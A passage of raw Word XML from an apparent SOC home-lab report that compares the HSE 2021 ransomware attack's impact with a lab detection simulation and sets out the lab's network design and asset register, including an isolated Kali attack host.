              <w:t>HSE 2021 — Real-World Impact</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="20" w:after="10"/>
              <w:ind w:hanging="180" w:start="240"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="922B21"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>80,000+ endpoints encrypted</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="10" w:after="10"/>
              <w:ind w:hanging="180" w:start="240"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="922B21"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1 million patients affected</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="10" w:after="10"/>
              <w:ind w:hanging="180" w:start="240"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="922B21"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Chemotherapy sessions cancelled</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="10" w:after="10"/>
              <w:ind w:hanging="180" w:start="240"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="922B21"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>€</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="922B21"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>100M+ remediation cost</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="10" w:after="10"/>
              <w:ind w:hanging="180" w:start="240"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="922B21"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>6+ months for full recovery</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="10" w:after="0"/>
              <w:ind w:hanging="180" w:start="240"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="922B21"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>57-day undetected dwell time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="AED6F1"/>
              <w:start w:val="single" w:sz="6" w:space="0" w:color="AED6F1"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="AED6F1"/>
              <w:end w:val="single" w:sz="6" w:space="0" w:color="AED6F1"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="D5F5E3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="60"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E8449"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">✅  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E8449"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Lab Simulation — Key Outcomes</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="20" w:after="10"/>
              <w:ind w:hanging="180" w:start="240"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="1E8449"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>All 7 kill-chain phases detected</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="10" w:after="10"/>
              <w:ind w:hanging="180" w:start="240"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="1E8449"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>C2 beacon identified within 30 min</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="10" w:after="10"/>
              <w:ind w:hanging="180" w:start="240"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="1E8449"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3 custom Wazuh rules engineered</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="10" w:after="10"/>
              <w:ind w:hanging="180" w:start="240"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="1E8449"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Full forensic timeline reconstructed</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="10" w:after="10"/>
              <w:ind w:hanging="180" w:start="240"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="1E8449"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Complete MITRE ATT&amp;CK mapping</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="10" w:after="0"/>
              <w:ind w:hanging="180" w:start="240"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="1E8449"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Clean environment restored from snapshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_Toc5001"/>
      <w:r>
        <w:rPr/>
        <w:t>Lab Architecture &amp; Asset Register</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Spider Wizard SOC Home Lab models a small-enterprise Active Directory environment with realistic network segmentation, remote access simulation, and centralized log collection. The architecture deliberately mirrors the HSE's distributed Windows estate to ensure detection engineering findings are operationally relevant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="D6E4F0"/>
        </w:pBdr>
        <w:spacing w:before="240" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.1  Network Design</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:start w:w="140" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:end w:w="140" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1599"/>
        <w:gridCol w:w="7761"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1599" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="2E75B6"/>
              <w:start w:val="single" w:sz="6" w:space="0" w:color="2E75B6"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="2E75B6"/>
              <w:end w:val="single" w:sz="6" w:space="0" w:color="2E75B6"/>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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7761" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="2E75B6"/>
              <w:start w:val="single" w:sz="6" w:space="0" w:color="2E75B6"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="2E75B6"/>
              <w:end w:val="single" w:sz="6" w:space="0" w:color="2E75B6"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="D6E4F0" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Internal LAN: 10.10.10.0/24 (VMware Host-Only). WAZUH01 acts as a Tailscale Subnet Router advertising 10.10.10.0/24, enabling WS-EMP01 (a remote laptop) to reach all lab machines without physical LAN access — mirroring corporate split-tunnel VPN architecture. The attack host (ATTACK01 / Kali Linux) was introduced during simulation phases only and isolated at all other times.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5837555" cy="3187065"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="Picture 6" descr="0afab311-5547-40cd-9925-61366bbf7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0afab311-5547-40cd-9925-61366bbf77f7"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5837555" cy="3187065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="D6E4F0"/>
        </w:pBdr>
        <w:spacing w:before="240" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.2  Asset Register</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblpPr w:vertAnchor="text" w:horzAnchor="page" w:leftFromText="180" w:rightFromText="180" w:tblpX="828" w:tblpY="210"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="10764" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="-7" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:start w:w="120" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:end w:w="120" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1117"/>
        <w:gridCol w:w="1186"/>
        <w:gridCol w:w="1383"/>
        <w:gridCol w:w="1454"/>
        <w:gridCol w:w="969"/>
        <w:gridCol w:w="1244"/>
        <w:gridCol w:w="1050"/>
        <w:gridCol w:w="2361"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="481" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1117"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Asset ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1186"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Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383"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Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="145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IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969"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OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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Key Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="105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Criticality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2361"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Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1085" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="111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SRV-DC01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="118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DC01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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Domain Controller / DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="145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c>
          <w:tcPr>
            <w:tcW w:w="96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Windows Server 2022</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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AD DS, DNS, Wazuh Agent, Sysmon v15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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Sysmon, Windows Security Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1046" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="111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SRV-FS01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="118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FS01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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File Server / FIM Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="145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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="96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Windows Server 2022</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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SMB Shares (4), Wazuh Agent, Sysmon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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3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FIM, Sysmon, File Access Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1126" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="111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SRV-WAZUH01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="118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WAZUH01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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SIEM Manager / Router</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="145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10.10.10.30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="96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Ubuntu 24.04 LTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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4.7 Manager + Dashboard, Tailscale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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3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self-monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1041" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="111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CL-EMP01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="118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WS-EMP01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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Employee Workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="145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Tailscale: 100.69.251.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="96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Windows 10 22H2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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MS Office, Wazuh Agent, Sysmon v15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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Sysmon, Windows Security Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1004" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="111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C9211E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="C9211E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>PLN-ATK01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="118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C9211E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="C9211E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ATTACK01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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C9211E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="C9211E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Red Team / Simulation Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="145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C9211E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="C9211E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>10.10.10.40 (sim only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="96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C9211E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="C9211E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Kali Linux 2026.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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C9211E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="C9211E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Atomic Red Team, Sliver C2, Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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C9211E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="C9211E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>N/A (isolated)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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C9211E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="C9211E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="D6E4F0"/>
        </w:pBdr>
        <w:spacing w:before="240" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
